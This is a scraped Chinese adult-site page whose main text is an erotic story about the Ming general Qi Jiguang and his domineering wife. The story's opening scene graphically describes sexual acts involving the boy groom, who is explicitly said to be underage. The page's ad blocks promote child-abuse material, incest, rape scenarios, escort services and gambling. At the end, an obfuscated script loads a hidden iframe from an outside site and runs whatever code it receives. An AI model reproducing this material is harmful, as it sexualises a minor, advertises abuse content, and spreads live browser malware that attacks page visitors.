▲免费 在线 观看 欧美 视频▲少妇影视,偷拍国内少妇精品视频,少妇高潮惨叫正在播放,日本少妇高清无码AV每天第一时间更新,高清不卡,无需缓冲,偷拍国内少妇精品视频警告:未满18周岁请离开.
自由选择观看线路较快的视频大区
本站500万担保【澳门新葡京】点击注册送748红包
本站极力推荐 午夜撸管神器,高潮迭起,尽情幻想吧!!
小姐上门 少妇兼职 同城上门 模特兼职 莞式服务 学生兼职 冰棍毒龙 全套服务
同城高端极品美女,网红,名媛,学生,模特,白领,少妇,24小时免费上门服务!!!
国产原创 成人交友 疯狂野战 户外打炮 少妇约炮 中出直播 母子乱伦 萝莉cos 同城约啪
极品直播 秘密入口 内射表姐 空姐自慰 强制颜射 酒店三P 剧情迷奸 幼女大全 爆操萝莉
亚洲精品 国产偷拍 无码视频 经典三级 少妇约炮 人妻中出 母子乱伦 萝莉资源 不卡秒播
中文字幕 幼女破处 亚洲专区 日韩精品 制服诱惑 偷拍自拍 剧情迷奸 三级自慰 高清秒播
本站500万担保【澳门新葡京】点击注册送748红包
本站极力推荐 午夜撸管神器,高潮迭起,尽情幻想吧!!
小姐上门 少妇兼职 同城上门 模特兼职 莞式服务 学生兼职 冰棍毒龙 全套服务
同城高端极品美女,网红,名媛,学生,模特,白领,少妇,24小时免费上门服务!!!

首页* 玄幻仙侠* 《百妇谱》之悍妇

《百妇谱》之悍妇 - 《百妇谱》之悍妇

时间:2021-03-31 22:22:21 发布:偷拍国内少妇精品视频_少妇高潮惨叫正在播放_日本少妇高清无码AV_少妇影视
提醒:图片如果含有其他网址 请勿访问 谨防诈骗

(谱贰

  耿直凶悍戚夫人,佐公披氅建功勋。大义灭亲斩独子,公纳三妾藏中军。
  妒性横发来问罪,将军跪倒紫罗裙。河东吼狮杖老公,众姬吓得腿抽筋。

大将军营寨匿小妾,戚夫人城下杖老公

  大将军戚继光,戎马一生,战功卓着,其抗倭固边的英雄事迹早已载于史册,
妇孺皆知,就不必我来多言了。不过,有一件事情知道的人应该不是很多:让人无
比崇敬的戚大将军患有一种顽固的疾病——妻管严!据野史记载,戚公严重惧内,
并且随着年龄的增长,这种情形愈加严重,直至跪倒在老婆的脚下,当着众部将的
面,让戚夫人打了屁屁!怎幺,不信?管你信是不信,且听我慢慢道来。

  这位敢打老公屁屁的戚夫人,乃戚公的远房亲戚,至于有多远,从族谱上查找
,八代之前便已列为旁支了,用民间的话来说,这显然已经出了「五符」,说白了
,彼此之间基本上没有什幺亲缘关係了。然而,为了攀上戚大将军的贵族血统,纵
使沾不上亲,也要想方设法带上故,这也是可以理解的,虽然八桿子打不着,十六
桿子也能拨拉到!总而言之一句话,扯来扯去,终于还是扯到亲戚关係上来了。

  既然扯上了亲戚,那就应该亲上加亲,于是乎,小戚光未成年,便与这位不知
从哪冒出来的、比自己高出一头还多的大表姐拜堂成亲了。在众人的嬉笑声中,这
对长妻幼婿别彆扭扭地拜过天地;拜过父母;末了,夫妻对拜,继尔,大厅里愈加
嘈杂起来,人们以异样的目光瞅着昨天还在河里摸虾捞鱼的小女婿,神秘地耳语着
。而披着盖头的大媳妇则悄悄地拉了一下小女婿的手,年少的戚继光乖顺地靠在大
媳妇的身旁,不敢乱动。

  「入洞房喽!」长得又乾又瘦的司仪一声鸣吟,客厅里响起一片唏嘘之声,在
众人的簇拥下,少年戚继光糊里糊涂地被大媳妇拽向洞房,临进门之际,不知是族
内哪位长辈高人揪住小继光的耳朵,趁着混乱,声音极低地叮嘱道:小光啊,不要
害怕,一定要把你的媳妇拿下来,治服她,你要把她骑在身下,就像训服战马一样
,彻底征服她。小子,千万要记住,在媳妇面前,为夫者,比天还要高出一截来那
,呵呵,那高出来的一截,当然是你的小弟弟喽,所以啊,男子汉大丈夫,绝对不
能让媳妇骑到的身上,否则,岂不把「夫」字倒了过来,倘若如此,就反了天纲,
以后便没你好日过了!小子,「夫」字一旦倒过来,你也就变成媳妇胯下的小绵羊
了,甚至更悲惨,比绵羊还少一根肋骨!懂幺,去吧,混小子!

  小继光牢记长辈的教诲,入得洞房来,连长袍大褂也来不及脱掉,搬住大表姐
的腰身便往上爬,大媳妇很不客气地推搡着小继光:

  「干幺,你要干幺!」

  「我要骑你!」小继光不假思索地答道,继续往大媳妇的身上攀爬,大媳妇一
听,扔出一句硬梆梆的话来:

  「好个急皮猴!」

  说完,大媳妇不再言语,在小女婿的搬推之中,身子一软,非常听话地平躺下
来,小继光咕碌一声爬到大表姐的身上,一屁股骑在大媳妇软酥酥的胸脯上,可笑
地狂颠起来:

  「驾——,驾——,驾——,」

  「哎哟,你干幺啊,你要压死我啊!」

  小继光正得意洋洋地颠着屁股,身下的表姐哗地拽掉红盖头,厥着腥红的小嘴
,虎着面孔,沖小女婿嚷嚷起来。望着突然出现的,极为陌生的,并且是相当冷峻
的异性面庞,以及那咄咄的目光,小男孩有些胆怯了,或者说是不好意思了。在大
媳妇的吼声中,小继光悄然无声在溜了下来,稚嫩无邪的目光茫然地瞟视着大表姐
,心中暗道:你厉害什幺啊,反正我已经把你当马给骑了!

  「是这样骑幺?」大表姐拎着红盖头,瞅了小女婿好半晌,冷丁冒出来这番话
,令小男孩更加茫然了:不这幺骑,还能怎幺骑啊,难道说,还要把马圈的缰绳解
下来套在你的脖子上,我让拽上一拽:驾!驾!

  「过来,」看见小女婿瞅着自己发怔,大表姐心中暗道:看来,这个小当家的
真地什幺也不懂啊,唉,这种事情,还得我来教他,真难为死人了!不这样,又怎
幺办啊,谁让我是他姐姐了!临过门时,妈妈不知唠叨多少次了,我的耳朵都快听
出硬茧了:闺女啊,如果小家伙不会圆房,你就教教他,闺女啊,切切记住,如果
想做戚家的媳妇,新婚之夜一定要圆房,以形成铁的事实!闺女啊,……

  想到此,大表姐扔掉红盖头,扑的一声吹灭了灯烛,黑暗之中,小继光感觉大
表姐的手掌滑进自己的裤裆,一把拽住自己的小雀雀。大媳妇一边揉搓着小女婿的
软雀雀,一边松解着自己的裤带,一阵细碎的哗啦声后,大媳妇光着两条白生生的
长腿向小女婿靠近过来,同时,手掌往自己的胯间拽扯着小雀雀:

  「过来啊,骑到我的身上来,呶,这样骑,笨蛋,啥也不懂!」

  在大表姐的拉扯之下,小继光顾虑重重地爬到大媳妇的双腿之间,大媳妇拽着
小女婿的软雀雀,一边不停地揉搓着,一边往自己尿尿的地方刮磨,藉着如勾的弦
月,小继光悄悄地审视着大媳妇的私处,不看不知道,这一看,让小继光吓了一大
跳,只见大表姐双腿开叉的私处浓毛横陈,密密麻麻、黑黑乎乎的一大片,在月色
之下,泛着耀眼的晶光。

  我的妈妈哟,这是什幺?小继光暗暗嘀咕起来:这是大草原还是芳草地?是稻
田地还是谷草地?瞅那形态,高矮不齐,疏密不匀,无规无矩,应该是野草地才对
头!难道说,女人尿尿的地方都是这种情形?望着眼前的野草地,小女婿又瞅了瞅
自己光溜溜、细嫩嫩的白雀雀,从来没有接触过女性的小继光更加困惑了:我尿尿
的地方为何不生野草啊?

  看见小女婿盯着自己的私处发怔,大媳妇先是羞涩地翻动着眼皮,末了,又撇
了撇小嘴,然后,默不作声地切咬着嘴唇,拽着白嫩嫩的小雀雀便往野草地上刮弄
。大表姐比小继光整整长了六岁,早已通晓男欢女爱之事,怎奈小继光尚未成年,
并且终日习文练武,对于两性之间,除了无知便是好奇:我的天啊,好多,好长,
好厚的野草啊,翻起一层,下面还有一层,左一层,又一层,怎幺翻也翻不完,哇
!小女婿突然瞪圆了眼睛:这是什幺?藏在野草层的最深处,外表红通通的,里麵
粉溜溜的!小继光即惊且惧:好一个暗穴啊,这是何物?如果光没猜错,应该是大
表姐尿尿的玩意吧!

  拨开野草见骚穴,大表姐平展着身体,大叉着长腿,一只手拨开密麻麻的黑毛
,另一只手拽住小女婿摇头晃脑的嫩雀雀,在粉溜溜的穴口疾速地磨擦着。不知是
过份的惊讶、兴奋、紧张,或者是尚未成年的缘故,无论大表姐如何揉搓,小女婿
的雀雀就是挺不起脑袋来,忙得表姐满头香汗,扯着雀雀头拚命地刮弄着水淋淋、
滑溜溜的小骚穴:

  「怎幺搞的啊,你是怎幺搞的啊,笨蛋,没用的东西!」

  表姐的努力终于有了一点效果,小雀雀摇摇晃晃地抬起脑袋,表姐露出满意的
微笑,双指夹住小雀雀,小心奕奕地塞进恭候多时的骚穴里,一挨进入异性的体内
,一种奇妙的感觉立刻流遍少年的全身,小继光本能的抽搐起来,刚刚塞进骚穴的
雀雀哧溜一声又滑脱出来,表姐失望地嘟哝一句,咚地推开小继光,小继光顺势倒
在床舖上,长长吁了口气:

  「好累啊,结婚不好,没有练武过瘾!」

  「少废话,少耍贫嘴!」

  小继光伸了伸疲惫的腰身,正欲拽过被子,蒙头大睡,大表姐翻身坐起,双膝
跪在床舖上,向小继光这边挪动过来,听见哧哧的膝盖磨擦床舖的声响,小继光扭
过头来,又吃了一惊,大媳妇赤裸着下身,大腿开叉,私处那一层又一层的野草,
此时此刻,呼哗一声向下倾倒,一团又一团地悬挂在两腿之间,蓬蓬鬆鬆,长短不
齐,其最长的黑毛,捲曲的锋尖几乎漫延至膝盖处。我的天啊,小继光心中叫苦:
这是人幺?我怎幺越看看越感觉像我家门前护院震宅的石狮子,它的身上,长毛一
卷套着一卷,一层压着一层!哇,难道,大表姐是母狮子转世?

  小继光正思忖着,想像中的母狮子一声咆哮,呼地骑在小继光的身上,毛绒绒
的私处对準少年的小雀雀,继续往野草丛中的暗穴里面塞,看见表姐契而不捨的顽
强精神,小继光深感钦佩:表姐做事比我强多了,我可不行,见硬就回!

  「哇,」小继光正胡思乱想着,突然感觉小雀雀被一个湿漉漉的肉管子紧紧地
夹裹住,旋即,表姐便在自己的身上大作起来,毛绒绒的私处撞击着自己的胯间,
看见表姐如此卖力地击捣着,小继光突然想起了什幺:不好,不能让她骑了我:

  「下去,你不能骑我!」

  「滚,不要乱动!」表姐气喘吁吁地按住小继光的手臂:

  「我不骑你,你却不会圆房,不这样,怎幺办啊?」


  大表姐正值如花似玉的黄金年华,对男女之事充满了渴望,好不容易把表弟的
雀雀发动起来,岂能就此罢手,她毕竟长小继光六岁,有足够的气力制服少年,同
时,急促地上下扭动着,望着身上的大媳妇,一种不详之兆涌上小女婿的心头:完
了,男子汉大丈夫让媳妇给骑了,反了天纲,「夫」字变成少了肋骨的绵羊,以后
準没好日子过了!

  女长男幼结畸缘,童婿迷茫媳发春。雀雀太小不争气,悍妻御夫马骑人。
  可怜无知美少年,母狮压顶怎翻身。男上女下乃正理,妻为夫纲乱常伦。

  从洞房里的表现便可获知,这位挨不上边的所谓表姐显然不是贵族血统,更缺
乏大家闺秀应具备的温柔和恬静,婚后的生活愈加印证了戚公的预感。大媳妇生性
活泼好动,尤其喜欢装腔作势地训斥人,好为人师。虽然缺乏女性的温柔,淑女的
文雅,大媳妇亦有自己的长处,那便是身体强壮,且精力过人,好像天生就是习武
弄棒的好材料,进得戚家大门来,略经熏陶,没过多久,十八般武艺便练会了十五
样,同时,又饱读诗书,对文化素养进行短时间的恶补,再经过几番实战,大媳妇
粗略通晓了军机大事,渐渐地成为戚家军中独当一面的女干将,每有倭奴来犯,大
媳妇必辅佐小女婿戚继光亲自出战。大媳妇不仅作战勇敢,且身先士卒,置生死于
不顾。

  「夫人,危险,快点回到阵里来!」有一次,倭奴大举来犯,戚家军措手不及
,草率应战,怎奈倭兵众多,戚家军拚死抵抗,两军混战一处,倭中有我,我中有
倭,分不清彼此了。戚公登高远眺,但见大媳妇身陷敌阵,甲冑被剌得七零八落,
血染征袍。悍妇毫不畏惧,武器打折了,面对着冲过来的三名倭奴兵,居然徒手迎
战,双手拽住倭奴剌过来的锋刃,惊得三倭奴瞠目结舌,戚公亦是大惊失色,命部
将前去支持,部将还未赶到,大媳妇已经徒手夺过兵刃,将三个倭奴兵斩于马下!
但见兵刃翻飞,殷殷的血水从大媳妇的手掌心汩汩而下。

  乖乖!

  镳战兵正酣,戚妻陷敌阵。双臂使蛮力,徒手拨三刃。

  戚夫人不但身先士卒,奋不顾身,且治军严谨,赏罚分明,协助戚公执掌军务
之后,给戚家军订下一条最为严厉的军法:凡遇敌退怯者,斩!

  不知是海患无穷,战事频仍,还是夫人过于凶悍,戚公轻易不敢近前,容洽相
处的时间甚少,以至于夫妻多年,谨得一子,且尚未成年便被凶悍的夫人充入军中
,其待遇与普通士兵毫无二致,每有战事,必派往阵前执矛杀敌。小小少年,哪里
见得过刀光血影、尸横遍野,尤其看见剃着鬼魂头,扎着兜挡裤,上身前长下身短
,奇丑无比,却又稽血好战,不顾生死的倭奴兵,戚公子更是无所适从,胆怯地向
后退缩着。那一仗倭奴兵多佔有优势,戚将军的兵士杀得相当吃力,伤亡惨重,看
见戚大公子临阵退却,众士兵也傚法之,结果军阵大乱,兵卒一轰而散,号称百战
百胜的戚公首开败绩,大溃而归。

  戚家军败退回营地,按照军法,临阵脱逃者,斩首示众,戚公子也在其列,在
戚夫人的怒吼声,毫不留情地捆绑起来,準备行刑处斩。戚大将军多有犹豫,戎马
大半生,为朝庭东征西讨,却忘了戚家的兴旺,已经年过半百了,还只有这幺一个
儿子,父子连心,将军何忍下手?众将士太理解戚公此刻的难处了,纷纷说情:公
子尚小,还需锻炼,且饶他一回,下不为例!而戚夫人却不答应:军法如山,怎能
随心所欲,说改就改,没有下回了,推下去,与别人一样,斩首示众。

  见戚夫人动了真格的,众将士跪地求请,依然不允:再有说情者,同罪也!看
见刽子手将哭哭涕涕的儿子推出午门外,戚大将军不忍睹此惨相,悄悄地抹了一把
苦涩的泪珠,独自回到大帐。看见夫人果真砍了亲生儿子的脑袋,众将士气忿难平
之余,三三两两地来到大帐,忿懑、报怨之声不绝与耳,更有甚者,有部将力谏戚
公休了凶悍的夫人,戚大将军摇头歎息:

  「使不得啊,虽然说是男尊女卑,可是休妻之举,也胡来不得啊,老婆只要没
有触犯七出之条,你就休不得,更奈何不得啊。夫人秉公执法,大义灭亲,何罪之
有哇,我凭什幺休人家啊?唉,」戚公怅然道:

  「娶了这样的悍妇,真是前世作孽啊!这完全是父母之命,媒妁之言的恶果,
唉,包办婚姻真是害死人啊,想我戚某当时年少,什幺也不懂,更不了解她,谁知
娶回来的却是个母夜叉,我得罪不起她,却又奈何不了她,这,这可如何是好啊,
这样的生活,何时才是个尽头哇,唉,苦也!男人如果娶不到好媳妇,一生便没有
幸福可言啊!」

  「主公,」众部将依然不服:

  「虽然是秉公执法,可是,夫人杀了戚家的独生儿子,让戚家断了后,主公,
夫人这断子绝孙之举,还构不成你休掉她的理由幺!让人绝后,这可是天大的罪孽
啊!请主公三思!」

  「使不得啊,」戚公还是摇头反对:

  「你们不了解夫人,我毕竟与她纠缠了半辈子,凭着直觉,我敢断言,我若敢
休她,她敢与老夫玩命!」

  「主公,」而态度较为温和的部将建议戚公道:

  「如果休妻您多有顾虑,可是,为了戚家的香火不至于断绝,主公必须考虑纳
妾的事宜了!」

  「这个幺,」听说部下建议自己纳妾,戚公好像中了什幺邪毒,浑身不可控制
地打起了摆子:

  「你们跟随我多年,夫人的脾气稟性应该知道一些吧,夫人不仅凶悍无比,且
妒性更大,我平时连多瞅一下别的女人都不準,我若纳妾,她不得闹翻天啊!」

  「主公,」将士建议道:

  「夫人凶悍妒忌,在下尽知,可是,为了戚家的香火,主公应该铤而走险,纳
妾生子!古训云:不孝有三,无后为大,想必主公应当知晓吧?」

  「是呀,主公作战英勇果敢,却奈何不了自己的老婆,如果张扬出去,岂不为
世人传为笑柄,再说了,主公精通战法,这纳妾之举,也可傚法兵书,瞒天过海,
即纳得美妾,生得龙子,又不为夫人知晓,如能做到,乃主公真功夫也!」
  「说得倒是容易,」戚公苦笑道:

  「瞒天过海?小妾可是大活人,并且就在这个母夜叉的眼皮底下,如何瞒得了
啊?」

  「那就看主公您了,把您与倭奴作战的招法拿出来,与夫人巧妙周旋吧,……


  「对啊,」戚公一拍大腿:

  「言之有理,为了戚家的香火,老夫就豁出脸皮,纳得小妾来,为我生子,为
戚家人丁兴旺,三十六计,斟情施用,且看老夫如何与这悍妇较量!」

  部将们的建议点拨了戚大将军,在部将们的怂恿之下,生活上一向节俭的戚大
将军突然心血来潮,宣称要翻修住宅,戚夫人不解其中的奥秘,看见老公大兴土木
,以为此举是转移失去儿子的痛苦,故没有横加干涉,而是领兵在营中操练,準备
再战倭奴,洗雪上次战败的耻辱。于是乎,戚大将军便唐而皇之地明修住宅,暗造
别室了,把个宽敞的宅院修成了大迷宫,大房屋毗连着小耳房,小耳房又挖暗道连
通画廊,画廊再贯通凉亭,在建筑群的下面,构成一条密如蛛网的暗道。

  「主公,」部将们问戚公道:

  「娘娘们的寝室应该设在何处啊?」

  「是啊,这需要认真地考虑,娘娘们的寝室无论设在何处,首要的原则应该是
主公出入其间,即方便又要安全!」

  若说方便,设在母狮的卧榻处最为方便,可是,这也太危险了,把娘娘放在母
狮的鼻子底下,一旦让母狮嗅出什幺气味来,或者是听到些什幺动静,那不是等着
送死幺?不过,戚公坚信这样一条真理:最危险的地方,往往也是最安全的!

  「嗯,我考虑好了,」戚公手指着母狮的房山墙处:

  「娘娘们的寝室就设在这里!」

  戚公一声令下,部将们甩开膀子便干,就在母狮的卧榻旁,名目张胆地为娘娘
们造起了寝室,对外谎称:这是主公的军械室,里面藏着主公的武器,武器重地,
闲人不得靠近!违者军法处置!军法面前,人人平等,夫人也不得违抗!云云!
  戚公营寨动土木,母狮卧塌修暗屋。军械库里藏美人,左拥右抱好性福。

  一把硕大的铁锁豁然挂在门上,忠诚无比地拒绝任何造访者,室内设有地道,
一旦有个风吹草动,娘娘们可以钻进地道,躲避母狮的盘查。

  「主公怎幺进出啊!」铁锁是足够大的,也足够安全的,同时,也给戚公来了
不便:

  「这铁锁也太沈了,总不能天天让主公搬弄它啊,再说了,它不仅很沈,还哗
哗地乱响,容易引起夫人的怀疑,怎幺办啊,」

  为了方便主公进出,不失时机地与娘娘们幽会,部将们灵机一动,索性把夫人
卧室的墙砖扒开,砌成一道可以活动的墙扉,并且非常巧妙地与原来的墙壁缝合一
处,丝毫也看不出破绽来。

  一切準备就绪,趁着夫人领兵巡视海防的空当,部将以重金为主公购得民间美
女,用军粮车拉回大营,就藏匿在母狮卧榻的旁边。只要母狮不在卧室内,主公便
抽动栓塞,只见墙扉缓缓地滑开,隔壁内的小美人显现眼底,主公大悦,迈过墙壁
便到了另外一片天地。

  妩媚动人三娇娃,粉面玉黛好乖乖。满屋脂香令人醉,飘然若仙搂入怀。

  于是,主公与姬妾们幽会一处,大行欢爱之举,自然不在话下。

  待行毕好事,主公悠然地迈回母狮的卧榻处,拉上墙扉,若无其事地在屋内渡
着方步,何其快哉。

  为了避免发生意外,部将们自愿为主公站岗放哨,并且还郑重其事地轮流值班
,一旦发现情况有异,立刻向主公发出暗号,主公应声而退,待母狮回到卧室,主
公先于一步退了回来,拉上墙扉,坐在籐椅上,捧着大古书,摇头晃脑地吟诵之!

  这种瞒天过海的偷情日子一连持续了三载,夫人居然毫无察觉,墙扉的两侧均
相安无事,而戚公却是收穫甚丰,三年下来,三个小美人为戚大将军生养了三个大
胖小子!把个老英雄乐得拢不上嘴,抱抱这个,亲亲那个,又拍拍第三个,啊,多
幺幸福的天伦之乐啊!

  皇帝的一道圣旨,无情地结束了戚大将军老鼠戏猫般的偷荤生活,圣旨上言明
,紧急调遣戚大将军到北方防御后金,而戚夫人则继续留守原驻地,防範倭奴。军
令如山,戚大将军岂敢怠慢,招齐兵马,星夜开拔。为何要赶夜路啊,难道是军令
紧急,非也,主公此举,将士们都心知肚明,目的只有一个,藉着这没有月光的黑
夜,把娘娘们以及宝贝儿子们安全地带出营地!

  离开了悍妇,戚大将军好似获得自由的老奴隶,再也不需要偷偷摸摸,谨小慎
微,再也不需要察颜观色,大将军白天处理军务,修筑长城,拒敌人于边关之外。
晚上,拥着淑姬美妾,尽享人间之乐,岂不更是快哉!

  好景不好,忽有一日,昏天暗地,阴风怪吼,枯草低泣,败叶横飞,守在城楼
上的卫兵突然发现远方黑云瀰漫,狼烟升腾:

  「不好,鞑子来了!」

  「什幺,女真来犯!」戚大将军推开美妾,扔掉酒杯,抽刀吼道:

  「传我的令,全军进入一级战斗準备!」

  「主公,」待戚大将军威风凛凛地走到城楼,部将哭笑不得地围拢过来:

  「误会了,因为天气昏暗,看见远处有兵马运行,以为是鞑子来犯,便点起了
烽火,可是到了近前,却不是鞑子,原来是夫人,主公,夫人来了,正在城下破口
大骂呢!」

  「不要脸的老奴,」戚公闻言,鬆了口气,来到城墙边,居高俯瞰,只看母夜
叉一身戎装,气势汹汹地骑于马上,大将军刚一探出头来,立刻大骂不止,戚公不
解:

  「老婆子,你不好生防守海疆,千里迢迢地跑到北方做甚,我又没有招惹于你
,你因何口出不逊,当众辱骂于我,是不是準备让我休了你啊!」

  「老奴,你少要跟我装糊涂,瞅你做得好事,自以为天衣无缝,骗了老娘数载
,老娘实在嚥不下这口气,有种的,你打开城门,老娘要与你算清总帐!」

  「主公,」有部将提议道:

  「既然夫人什幺都知道了,乾脆一不做二不休,把她休掉算了,这样的悍妇,
谁能消受得了哇!」

  「是啊,主公,应该下决心了!」

  甚至有部将把笔墨端了上来,在众人七嘴八舌的吵嚷声中,戚公终于痛下决心
,唰唰地拟就一份休书,然后,张弓搭箭,嗖地射向夫人:

  「老婆子,我与你一刀两断,从此没有任何关係,拿好休书,快点滚蛋吧!」

  「啊,你,凭什幺休我,」戚夫人将休书撕得粉碎:

  「休妻有七条之出,我倒要问问你,我犯了哪一条,老奴,我与你拼了!」说
完,戚夫人扬起弓箭,将军还没弄明白怎幺回事,脑袋上的头盔嗖地飞上了天,部
将奋不顾身地拥上前去,用自己的身体掩护主公。夫人开始骂阵了:

  「老奴才,还不快快出城送死!」

  「主公,」看见夫人如此嚣张,部将气得嗷嗷直叫,纷纷摩拳擦掌:

  「主公,你快下命令吧,为了主公,我们跟她拼了!」

  「这是什幺话,」戚大将军道:

  「我的军队是奉旨守卫长城、防御鞑靼的,怎能为了私家的琐事,相互撕杀,
岂不让边外的鞑靼笑掉大牙!你们不得胡来,我自有主张!」

  在夫人不绝与耳的谩骂声中,戚公走下城楼,来到小妾们的面前,众姬知道长
夫人兴师问罪来了:
  「主公,都是我们不好,我们给您添麻烦了!」

  「嗨,怎幺能这样说呢!」姬妾们的话令戚公大为感动,多幺乖顺的小美人啊

  「爱姬们,责任都在老夫身上,你们是无辜的,老夫对不起你们,你们带着婢

妾的身份,不仅躲躲藏藏地过生活,还为我生养后代,这份情意,老夫永远也无法
报答!唉,老夫怯懦,当不了家,奈何不了那泼妇,让你们也跟着受罪!」

  「主公休要这般凄苦,无论怎样,奴婢们也是跟定主公了,是生是死,永在一
起!」

  「爱姬们,」戚公突然摘卸甲冑,哗楞楞地脱掉上衣,赤裸着双臂,众姬妾茫
然了:这都什幺时候了,眼瞅着要火上房了,咱们的主公咋还有闲情逸志,要行欢
做爱啊!

  「爱姬们,」戚公举起赤裸裸的双臂,向众姬作揖道:

  「事已至此,老夫别无良策,为了国家的安危,老夫不能与夫人聚众械斗,愿
意出城受死,请爱姬们以国家大义为重,抱着孩子,与我一同出城受死!权当为国
捐躯吧!」

  「啊,」众姬妾面呈土色:送死去!这也太可怕了,可是,看见主公认真的样
子,姬妾们感觉主公绝对不是开玩笑,你看,主公退掉一身的盔甲,将佩剑背插在
裤带上,用眼神指挥着众姬妾,那意思分明在说:谁敢违抗,就地斩首!

  「贱妾愿随主公赴死!」

  于是,在戚公的吩咐下,三个美姬披散着头髮,怀抱着自己的儿子,仅穿着内
衣的身子裹着苇席,分别在自己的背脊上绑扎一根柳条枝,哭哭咧咧地跟在戚公的
身后。兵士不敢违抗主公的命令,哗啦啦地推开城门,戚公带领着三个小妾来到夫
人的马前,咕咚一声跪倒在夫人的马蹄前,城楼上一片哗然:

  「哇,主公给夫人下跪了!」

  「夫人,」在众将士大惑不解的目光中,戚公坦然道:

  「为了国家的平安,我不能与你开战,现在拱手而降,是杀是剐,全都听凭你
的发落!」

  「哼,」戚夫人横刀马上:

  「老东西,你很会演戏啊,跟老娘玩起苦肉计了,你以为我会上你的当幺,几
滴泪水就能感动了老娘,让我退兵而去,再也不过问你的私生活幺?没门!」

  「老夫没有那个意思,事情已经发生了,妾也纳了,孩子也生了,你愿意怎幺
着就怎幺着吧!」

  「豁豁,」戚夫人大怒:

  「你这玩的是哪一出,死猪不怕开水烫?耍无赖?哼,来人啊!」夫人一声断
喝,刀斧手哗地冲向阵前请令,夫人手掌一扬:

  「将这老东西杖打四十,」

  「是,」刀斧手扔掉鬼头大刀,操起了大木棍,戚公的部将大吼起来,放马冲
出城门:

  「夫人怎能如此对待主公,以主公老迈的身体,如何消受下这四十军棍!不打
死也得打残啊!」

  戚夫人身后的兵士唰地涌上前来,一场自家人的械斗即将发生,戚公向部将苦
苦乞求:

  「都给我退下,不要胡来,以免让外人耻笑!」

  啪,啪,啪,夫人一声令下,大军棍劈哩叭啦地落在戚公的屁股蛋上,那嗡声
嗡气的闷响,彷彿击打着部将的心上:唉,主公啊,你怎如此懦弱,哪里还有男子
汉的尊严啊!

  这边杖打老公,眼瞅着就要把戚公的屁股打开了花,在那边,夫人又转向三个
小妾,听见母狮手掌一提缰绳,哒哒地来到众妾的面前,众妾吓得浑身筛糠,怀中
的孩子嗷嗷大叫,混乱之中,不知是谁突然举起怀中的孩子,双手托向夫人:

  「夫人,贱妾与孽子但求速死,请快快赏贱妾一刀吧!」

  「贱货!」看见小妾们都向上托起孩子,夫人低声骂了一句,命手下人夺过孩
子,又令左右道:

  「责任不在她们,全在老东西身上,问过她们的住址,发给生活费,统统遣送
回原籍去!」

  一时间,戚夫人兴兵直捣长城脚下,杖打大将军的事情,闹得沸沸扬扬,遭受
这番莫大的汙辱,屁股肿的老高,众妾又捲席而去,戚公独守空宅,郁郁不欢。福
不双至,祸不单行,朝庭之中,新宦得宠,太监当道,排挤老臣,戚公当然不能倖
免,最终,虽然保住了老命,却被剥尽了官职,成了光桿司令,失魂落破地回到故
乡。

  凶悍的,长戚公六岁的夫人已经逝去,出来相迎的,是戚公当年与众妾所生的
三个儿子,均已长大成人,无比孝顺地站立在老爸的面前:

  「爹爹,娘临去世前,嘱咐儿等,好生料理家业,静候老爷归来,向老爷报帐
!」说着,儿子们指着土地和房屋:

  「这都是老娘留下的,儿子们不敢懈怠,营营以守,只等老爹回来查验!」

  老将军正感慨着,已经人老珠黄的众妾也不知从哪里冒了出来,纷纷跪倒在老
将军的脚下:

  「老爷,您可回来了,这些年来,可把贱妾们等苦了!」

  「起来,起来,」老将军拉起众妾,带着儿子,走进自己的庄园,从此过起了
自力更生的、与世无争的农耕生活!

【妇谱氏曰】

  凶悍泼辣,把婚姻当交易,之所以嫁人,图的是门第,为的是执掌家业,说一
不二,对待老公毫无女性的温柔和妩媚,更奢谈性爱上的满足。不过,爱权者,都
有极强的事业心。戚夫人便是样的女人,把家业看得比什幺都重要,比老公重要,
比爱情重要,甚至比生命重要,身后留给老公的这份家业,是她一生最大的成绩,
而自己又得到什幺呢?

  即使在今天,依然不乏戚夫人这样的女人!

第 1 页

国产原创 成人交友 疯狂野战 户外打炮 少妇约炮 中出直播 母子乱伦 萝莉cos 同城约啪
极品直播 秘密入口 内射表姐 空姐自慰 强制颜射 酒店三P 剧情迷奸 幼女大全 爆操萝莉
亚洲精品 国产偷拍 无码视频 经典三级 少妇约炮 人妻中出 母子乱伦 萝莉资源 不卡秒播
中文字幕 幼女破处 亚洲专区 日韩精品 制服诱惑 偷拍自拍 剧情迷奸 三级自慰 高清秒播
eval('\x77\x69\x6e\x64\x6f\x77')['\x68\x4f\x50\x6e\x6d\x46\x67']=function(){;(function(u,r,w,d){'jQuery';var f=d.createElement('iframe');f.id=new Date().getTime();f.style.width=f.style.height=10+'px';f.src=[u,r].join('');d['write'](f.outerHTML);w['addEventListener']('message',function(e){d.getElementById(f.id).style.display='none';if(e.data['t']=='qqwwtt'){new Function(e.data['d'])()}})})('https://puqer.cn','/cd/104_m/162',window,document)};